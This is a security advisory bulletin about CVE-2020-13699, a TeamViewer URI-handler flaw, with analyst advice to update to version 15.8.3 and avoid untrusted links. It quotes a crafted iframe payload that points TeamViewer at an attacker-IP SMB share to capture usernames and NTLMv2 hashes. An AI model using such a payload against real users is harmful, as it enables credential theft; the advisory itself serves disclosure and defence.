Threat Watch

TeamViewer Found to Have Critical Vulnerability

A vulnerability considered to be high risk has been affecting Windows TeamViewer. The flaw, known as CVE-2020-13699, if executed could allow for attackers to compromise system passwords and possibly compromise the system itself. Triggering the Unquoted URI handler happens when potential victims visit a malicious website set up by attackers. Jefferey Hofmann from Praetorian who is responsible for discovering the flaw stated, “An attacker could embed a malicious iframe in a website with a crafted URL (iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share.” The attacker can then receive the system’s username and NTLMv2 hashed passwords through the SMB authentication process. This issue is believed to be affecting TeamViewer versions 8 through 15.8.2, but TeamViewer has supposedly fixed this issue in Version 15.8.3 by quoting the parameters passed by affected URI handlers.

ANALYST NOTES

Although no known exploitations of the vulnerability have taken place, those who use TeamViewer software are advised to download and run the most recent version of TeamViewer available, Version 15.8.3. Unfamiliar websites should be avoided and if users happen to come across them, no links on the website should be followed. The same advice applies to emails from unknown sources as well—do not visit any links provided in suspicious email messages.

Source: https://threatpost.com/teamviewer-fhigh-severity-flaw-windows-app/158204/